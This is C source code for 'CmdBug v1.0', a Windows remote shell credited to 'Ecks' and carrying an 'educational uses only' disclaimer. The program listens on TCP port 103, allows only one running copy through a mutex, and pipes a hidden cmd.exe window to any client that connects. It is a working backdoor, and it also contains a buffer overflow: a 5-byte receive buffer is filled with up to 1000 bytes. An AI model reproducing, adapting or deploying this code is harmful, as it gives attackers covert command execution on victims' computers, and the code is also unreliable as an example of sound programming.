CmdBug - Remote Shell - Source Code

/*****************************************************\
|******************* CmdBug v1.0 *********************|
|****************** Coded By Ecks ********************|
|*****************************************************|
| This program is for educational uses only. It is not|
| intended to be compiled, tested, run, or distributed|
| in any way. If you break these terms you take full  |
| responsibility for anything your actions may cause. |
\*****************************************************/

#include <windows.h>
#include <winsock2.h>

DWORD WINAPI HandleScks(LPVOID lpParam);

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nCmdShow)
{
    CreateMutex(NULL, TRUE, "[~C~m~d~B~u~g~]");
    if(GetLastError() == ERROR_ALREADY_EXISTS) return 0;

    WSADATA wsaDat;
    if(WSAStartup(MAKEWORD(2, 2), &wsaDat) != NO_ERROR) return 0;

    SOCKET listenSck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(listenSck == INVALID_SOCKET) goto cleanup;

    sockaddr_in service;
    service.sin_family = AF_INET;
    service.sin_addr.s_addr = inet_addr("127.0.0.1");
    service.sin_port = htons(103);
    if(bind(listenSck, (sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) goto cleanup;

    if(listen(listenSck, 1) == SOCKET_ERROR) goto cleanup;

    SOCKET acceptSck;
    while(1) {
        acceptSck = accept(listenSck, NULL, NULL);
        if(acceptSck != INVALID_SOCKET)
            CreateThread(NULL, 0, HandleScks, (LPVOID)acceptSck, 0, NULL);
    }

    cleanup:
        closesocket(acceptSck);
        closesocket(listenSck);
        WSACleanup();
    return 0;
}

DWORD WINAPI HandleScks(LPVOID lpParam)
{
    SOCKET theSck = (SOCKET)lpParam;
    HANDLE stdinRd, stdinWr, stdoutRd, stdoutWr;
    SECURITY_ATTRIBUTES sa = {sizeof(SECURITY_ATTRIBUTES), NULL, true};
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    DWORD stuff;
    char buff[1000], recvBuff[5];
    bool firstsend;
    int offset = 0, bRecv;

    if(send(theSck, "Welcome To The CmdBug Server v1.0\r\nStarting The Remote Shell...\r\n\r\n\r\n", 69, 0) == SOCKET_ERROR) goto closeSck;

    if(!CreatePipe(&stdinRd, &stdinWr, &sa, 0) || !CreatePipe(&stdoutRd, &stdoutWr, &sa, 0)) {
        send(theSck, "Error Creating Pipes For Remote Shell. Closing Connection...", 60, 0);
        goto closeSck;
    }

    GetStartupInfo(&si);
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.hStdOutput = stdoutWr;
    si.hStdError = stdoutWr;
    si.hStdInput = stdinRd;
    if(!CreateProcess("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        send(theSck, "Error Spawning Command Prompt. Closing Connection...", 52, 0);
        goto closeSck;
    }

    while(1) {
        Sleep(100);
        GetExitCodeProcess(pi.hProcess, &stuff);
        if(stuff != STILL_ACTIVE) break;

        PeekNamedPipe(stdoutRd, NULL, 0, NULL, &stuff, NULL);
        if(stuff != 0) {
            ZeroMemory(buff, sizeof(buff));
            firstsend = true;
            do {
                ReadFile(stdoutRd, buff, 1000, &stuff, NULL);
                if(firstsend) { send(theSck, buff + offset, strlen(buff) - offset, 0); firstsend = false; }
                else send(theSck, buff, strlen(buff), 0);
            } while(stuff == 1000);
        }

        if(!strcmp(recvBuff, "\r\n")) offset = 0;
        bRecv = recv(theSck, recvBuff, 1000, 0);
        if( (bRecv == 0) || (bRecv == SOCKET_ERROR) ) break;
        recvBuff[bRecv] = '\0';
        WriteFile(stdinWr, recvBuff, strlen(recvBuff), &stuff, NULL);
        offset = offset + bRecv;
    }

    closeSck:
        TerminateProcess(pi.hProcess, 0);
        CloseHandle(stdinRd);
        CloseHandle(stdinWr);
        CloseHandle(stdoutRd);
        CloseHandle(stdoutWr);
        closesocket(theSck);
    return 0;
}